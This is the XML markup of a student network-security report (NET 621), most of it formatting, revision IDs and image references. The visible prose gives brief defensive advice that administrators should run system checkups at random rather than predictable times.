    <w:p w:rsidR="3E9CEAE0" w:rsidP="577B6A5F" w:rsidRDefault="3E9CEAE0" w14:paraId="74A8DE7B" w14:textId="7EBBD0F2">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="3E9CEAE0">
        <w:drawing>
          <wp:inline wp14:editId="3BB7BDFF" wp14:anchorId="64A70F87">
            <wp:extent cx="5943600" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1176965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557fed497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CEAE0" w:rsidP="577B6A5F" w:rsidRDefault="3E9CEAE0" w14:paraId="64D2A84A" w14:textId="5AFC3499">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="3E9CEAE0">
        <w:rPr/>
        <w:t>This is scary because most system administrators do routine checkups on a set amount of time, where it is easy to find what time administrators do checkups.</w:t>
      </w:r>
      <w:r w:rsidR="01E73393">
        <w:rPr/>
        <w:t xml:space="preserve"> The best way to stop this is to do checkups at random times.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="4D8317C4" w14:textId="25F17B44">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="01E73393" w:rsidP="577B6A5F" w:rsidRDefault="01E73393" w14:paraId="7393B715" w14:textId="6521DA91">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="01E73393">
        <w:rPr/>
        <w:t xml:space="preserve">Overall, this document has completed its purpose. </w:t>
      </w:r>
      <w:r w:rsidR="01E73393">
        <w:rPr/>
        <w:t>Hopefully</w:t>
      </w:r>
      <w:r w:rsidR="01E73393">
        <w:rPr/>
        <w:t xml:space="preserve"> this is useful for system administrators to reconsider policies that could be detrimental to a network.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a49b306557740cb"/>
      <w:footerReference w:type="default" r:id="R224d399fe54a4bd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1F1E62" w:rsidTr="066D311E" w14:paraId="6978C91B">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="32BB2722" w14:textId="5A210AFE">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:left="-115"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:color w:val="FF0000"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="066D311E" w:rsidR="066D311E">
            <w:rPr>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:color w:val="FF0000"/>
            </w:rPr>
            <w:t>Final</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="2E1D8CED" w14:textId="25D7824E">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF" w:themeShade="FF"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0D1F1E62" w:rsidR="0D1F1E62">
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF" w:themeShade="FF"/>
            </w:rPr>
            <w:t>NET 621</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="5956360E" w14:textId="72193036">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="0D1F1E62">
            <w:rPr>
              <w:color w:val="FF0000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0D1F1E62">
            <w:rPr>
              <w:color w:val="FF0000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="4A11F4F1" w14:textId="4BF5A8E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1F1E62" w:rsidTr="066D311E" w14:paraId="503241AD">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="08932104" w14:textId="13080B0D">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:left="-115"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono"/>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:color w:val="FF0000"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="066D311E" w:rsidR="066D311E">
            <w:rPr>
              <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono"/>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:color w:val="FF0000"/>
            </w:rPr>
            <w:t>Final</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="2E897A45" w14:textId="349FD9F6">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF" w:themeShade="FF"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0D1F1E62" w:rsidR="0D1F1E62">
            <w:rPr>
              <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF" w:themeShade="FF"/>
            </w:rPr>
            <w:t>NET 621</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="0C1B84FD" w14:textId="7621DBA9">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono"/>
              <w:color w:val="FF0000"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0D1F1E62" w:rsidR="0D1F1E62">
            <w:rPr>
              <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono"/>
              <w:color w:val="FF0000"/>
            </w:rPr>
            <w:t>Braxton Krusemark</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0D1F1E62" w:rsidP="0D1F1E62" w:rsidRDefault="0D1F1E62" w14:paraId="504D51A0" w14:textId="2E3EA5BC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:bidi w:val="0"/>
      <w:rPr>
        <w:rFonts w:ascii="Aptos Mono" w:hAnsi="Aptos Mono" w:eastAsia="Aptos Mono" w:cs="Aptos Mono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70a4d3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7">
    <w:nsid w:val="36f3eb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112bdb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439727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4">
    <w:nsid w:val="2923f3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162086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2">
    <w:nsid w:val="f8b52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">
    <w:nsid w:val="16b839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0">
    <w:nsid w:val="3a621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9">
    <w:nsid w:val="52d7ff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8">
    <w:nsid w:val="29e3ac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7">
    <w:nsid w:val="4ff81f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6">
    <w:nsid w:val="2527e3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5">
    <w:nsid w:val="715c9c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4">
    <w:nsid w:val="636536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3">
    <w:nsid w:val="79e99d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1123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3e4a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0B8D46"/>
    <w:rsid w:val="006424FA"/>
    <w:rsid w:val="00919580"/>
    <w:rsid w:val="00931FA8"/>
    <w:rsid w:val="00D493A6"/>
    <w:rsid w:val="01E73393"/>
    <w:rsid w:val="022B67EA"/>
    <w:rsid w:val="029D8B64"/>
    <w:rsid w:val="03F4D707"/>
    <w:rsid w:val="04D2FCCD"/>
    <w:rsid w:val="0659F63F"/>
    <w:rsid w:val="066D311E"/>
    <w:rsid w:val="070D1C0F"/>
    <w:rsid w:val="089B9F88"/>
    <w:rsid w:val="08BB5E1D"/>
    <w:rsid w:val="09D203E7"/>
    <w:rsid w:val="0AE2D8F7"/>
    <w:rsid w:val="0D1F1E62"/>
    <w:rsid w:val="0D92E04F"/>
    <w:rsid w:val="0EEB7D2A"/>
    <w:rsid w:val="10DCDACA"/>
    <w:rsid w:val="10F57997"/>
    <w:rsid w:val="1109EDA0"/>
    <w:rsid w:val="13656FC0"/>
    <w:rsid w:val="13D18E5E"/>
    <w:rsid w:val="159B6386"/>
    <w:rsid w:val="16409895"/>
    <w:rsid w:val="16F8DD1B"/>
    <w:rsid w:val="1716BDD0"/>
    <w:rsid w:val="1741DCB3"/>
    <w:rsid w:val="17738AAD"/>
    <w:rsid w:val="196A4D3F"/>
    <w:rsid w:val="199D4ADE"/>
    <w:rsid w:val="19C398E5"/>
    <w:rsid w:val="1B9F9B5F"/>
    <w:rsid w:val="1C3FE73F"/>
    <w:rsid w:val="1C5063D9"/>
    <w:rsid w:val="1CBEB296"/>
    <w:rsid w:val="1D902627"/>
    <w:rsid w:val="1DEEE471"/>
    <w:rsid w:val="2107F43C"/>
    <w:rsid w:val="21634A54"/>
    <w:rsid w:val="21DEF985"/>
    <w:rsid w:val="223C0FDD"/>
    <w:rsid w:val="22D28554"/>
    <w:rsid w:val="22FE3AA2"/>
    <w:rsid w:val="233B3C92"/>
    <w:rsid w:val="23BE71AD"/>
    <w:rsid w:val="24D4E110"/>
    <w:rsid w:val="25265E7F"/>
    <w:rsid w:val="257CF80D"/>
    <w:rsid w:val="2683EB53"/>
    <w:rsid w:val="287553DD"/>
    <w:rsid w:val="29067EFC"/>
    <w:rsid w:val="29774515"/>
    <w:rsid w:val="29A1D95C"/>
    <w:rsid w:val="29AC3DEB"/>
    <w:rsid w:val="2B5EA295"/>
    <w:rsid w:val="2B62CF93"/>
    <w:rsid w:val="2B64CCC5"/>
    <w:rsid w:val="2C391F76"/>
    <w:rsid w:val="2DBFED6E"/>
    <w:rsid w:val="2E584C64"/>
    <w:rsid w:val="2E76E9CD"/>
    <w:rsid w:val="2F4DC11B"/>
    <w:rsid w:val="305FD1F9"/>
    <w:rsid w:val="309ADEEE"/>
    <w:rsid w:val="30C2529D"/>
    <w:rsid w:val="317647AE"/>
    <w:rsid w:val="31B5449E"/>
    <w:rsid w:val="3209DF83"/>
    <w:rsid w:val="32BD488D"/>
    <w:rsid w:val="330700EC"/>
    <w:rsid w:val="333EB0A5"/>
    <w:rsid w:val="336ACA2D"/>
    <w:rsid w:val="3429865F"/>
    <w:rsid w:val="3449A17A"/>
    <w:rsid w:val="348F7104"/>
    <w:rsid w:val="34F0339E"/>
    <w:rsid w:val="34F0484A"/>
    <w:rsid w:val="3519CB79"/>
    <w:rsid w:val="35886698"/>
    <w:rsid w:val="35E80AE3"/>
    <w:rsid w:val="36F3517C"/>
    <w:rsid w:val="37BF37FA"/>
    <w:rsid w:val="38D2D74C"/>
    <w:rsid w:val="3948B67A"/>
    <w:rsid w:val="399494B2"/>
    <w:rsid w:val="39C3F408"/>
    <w:rsid w:val="39DD5270"/>
    <w:rsid w:val="39EF1ADA"/>
    <w:rsid w:val="3A0035EA"/>
    <w:rsid w:val="3A6A16AA"/>
    <w:rsid w:val="3B0CB186"/>
    <w:rsid w:val="3BBA2988"/>
    <w:rsid w:val="3BBA64DE"/>
    <w:rsid w:val="3C6AF940"/>
    <w:rsid w:val="3C9A0930"/>
    <w:rsid w:val="3E10D78C"/>
    <w:rsid w:val="3E2C4251"/>
    <w:rsid w:val="3E9CEAE0"/>
    <w:rsid w:val="3F04DB48"/>
    <w:rsid w:val="4077C303"/>
    <w:rsid w:val="407DC83B"/>
    <w:rsid w:val="4152EF71"/>
    <w:rsid w:val="4293698F"/>
    <w:rsid w:val="431E5B5A"/>
    <w:rsid w:val="43673920"/>
    <w:rsid w:val="43729B5F"/>
    <w:rsid w:val="439D34E0"/>
    <w:rsid w:val="443CC040"/>
    <w:rsid w:val="44C1C501"/>
    <w:rsid w:val="46D4D1B4"/>
    <w:rsid w:val="46E356C5"/>
    <w:rsid w:val="47E6EC45"/>
    <w:rsid w:val="47EABF69"/>
    <w:rsid w:val="48E5D68C"/>
    <w:rsid w:val="493178E7"/>
    <w:rsid w:val="4ACE9EF1"/>
    <w:rsid w:val="4BC38868"/>
    <w:rsid w:val="4C2E2673"/>
    <w:rsid w:val="4D0BDF42"/>
    <w:rsid w:val="4D53861C"/>
    <w:rsid w:val="4D6D1ED8"/>
    <w:rsid w:val="4D734019"/>
    <w:rsid w:val="4EDE6923"/>
    <w:rsid w:val="4EFB7479"/>
    <w:rsid w:val="4F721EDA"/>
    <w:rsid w:val="4FAD22D3"/>
    <w:rsid w:val="51752468"/>
    <w:rsid w:val="518CA146"/>
    <w:rsid w:val="530B8D46"/>
    <w:rsid w:val="5327387A"/>
    <w:rsid w:val="5384AEFF"/>
    <w:rsid w:val="547A019E"/>
    <w:rsid w:val="54DB5A55"/>
    <w:rsid w:val="54F533ED"/>
    <w:rsid w:val="552A39F4"/>
    <w:rsid w:val="557B4BC0"/>
    <w:rsid w:val="55868E1C"/>
    <w:rsid w:val="55C7E98C"/>
    <w:rsid w:val="56509D47"/>
    <w:rsid w:val="56585CD2"/>
    <w:rsid w:val="567DF9F4"/>
    <w:rsid w:val="577B6A5F"/>
    <w:rsid w:val="58261489"/>
    <w:rsid w:val="5836FECA"/>
    <w:rsid w:val="584B81B4"/>
    <w:rsid w:val="589E3211"/>
    <w:rsid w:val="58CE7706"/>
    <w:rsid w:val="593C12D0"/>
    <w:rsid w:val="596F5BC0"/>
    <w:rsid w:val="5AA99312"/>
    <w:rsid w:val="5ABC1A80"/>
    <w:rsid w:val="5AED9E6C"/>
    <w:rsid w:val="5B439883"/>
    <w:rsid w:val="5C1E7EC2"/>
    <w:rsid w:val="5D5B1F9C"/>
    <w:rsid w:val="5DB4E0DB"/>
    <w:rsid w:val="5E0339A1"/>
    <w:rsid w:val="5E68D25B"/>
    <w:rsid w:val="5E6DB348"/>
    <w:rsid w:val="5E98719A"/>
    <w:rsid w:val="5FD150AB"/>
    <w:rsid w:val="5FEB2391"/>
    <w:rsid w:val="60864629"/>
    <w:rsid w:val="611C4341"/>
    <w:rsid w:val="625432F1"/>
    <w:rsid w:val="62E40457"/>
    <w:rsid w:val="63384872"/>
    <w:rsid w:val="63CF7F42"/>
    <w:rsid w:val="64B6EB1D"/>
    <w:rsid w:val="65011E0D"/>
    <w:rsid w:val="6617821D"/>
    <w:rsid w:val="66EFB87C"/>
    <w:rsid w:val="68620E29"/>
    <w:rsid w:val="689D7654"/>
    <w:rsid w:val="696BBA06"/>
    <w:rsid w:val="69A76B98"/>
    <w:rsid w:val="6C1578A8"/>
    <w:rsid w:val="6C7A924A"/>
    <w:rsid w:val="6CC49EA2"/>
    <w:rsid w:val="6CD14321"/>
    <w:rsid w:val="6CF6AD7A"/>
    <w:rsid w:val="6D88CFEB"/>
    <w:rsid w:val="6E56F1F7"/>
    <w:rsid w:val="6EB73E0E"/>
    <w:rsid w:val="6F27290B"/>
    <w:rsid w:val="6FA361F8"/>
    <w:rsid w:val="702FCF33"/>
    <w:rsid w:val="703DB4BE"/>
    <w:rsid w:val="70DFAEFF"/>
    <w:rsid w:val="71BE620B"/>
    <w:rsid w:val="72A63646"/>
    <w:rsid w:val="73FC239C"/>
    <w:rsid w:val="74CE579F"/>
    <w:rsid w:val="753B233B"/>
    <w:rsid w:val="774AADAF"/>
    <w:rsid w:val="78596AA9"/>
    <w:rsid w:val="7890B98B"/>
    <w:rsid w:val="78E543D4"/>
    <w:rsid w:val="790B1AD8"/>
    <w:rsid w:val="79C2C8AB"/>
    <w:rsid w:val="7A102436"/>
    <w:rsid w:val="7A50BE14"/>
    <w:rsid w:val="7AA04480"/>
    <w:rsid w:val="7ACCFEE9"/>
    <w:rsid w:val="7B8BBCE6"/>
    <w:rsid w:val="7BA74DB6"/>
    <w:rsid w:val="7BB076A8"/>
    <w:rsid w:val="7BBEE6FA"/>
    <w:rsid w:val="7C68C529"/>
    <w:rsid w:val="7DEFC18B"/>
    <w:rsid w:val="7E248254"/>
    <w:rsid w:val="7F12745D"/>
    <w:rsid w:val="7F3C3FB3"/>
    <w:rsid w:val="7F59C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B8D46"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3AD0F2A9-1841-416B-BDAC-56FA49D326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0D1F1E6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D1F1E6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0D1F1E62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uiPriority w:val="99"/>
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="577B6A5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6a49b306557740cb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer.xml" Id="R224d399fe54a4bd2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R1349cda93e224c18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="Rf15aa1fd5d3644dc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R7ccd8b3c277e4818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R6bf2f5b8b51643ad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R4167281011b84662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R78e7266b70374285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="Ref3abf8cc8b4489a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R553e64e06c3248ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rcebfd26474214a16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.software.com" TargetMode="External" Id="R825ca796beec47e7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Rce12363da2cf4e39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="Rbac0fc026a194e30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R32273c28db264cca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R68a7f84122534cad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="R230584052983403e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="R482cdabbf7354a01" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="Rb36eb768171c4136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="R18aa9e38c7024a5c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R011634adf5ec48b1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="Rfb2557fed49741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2025-02-27T00:03:44.0595324Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-04T21:16:42.2874906Z</dcterms:modified>
  <dc:creator>Braxton Krusemark</dc:creator>
  <lastModifiedBy>Braxton Krusemark</lastModifiedBy>
</coreProperties>
</file>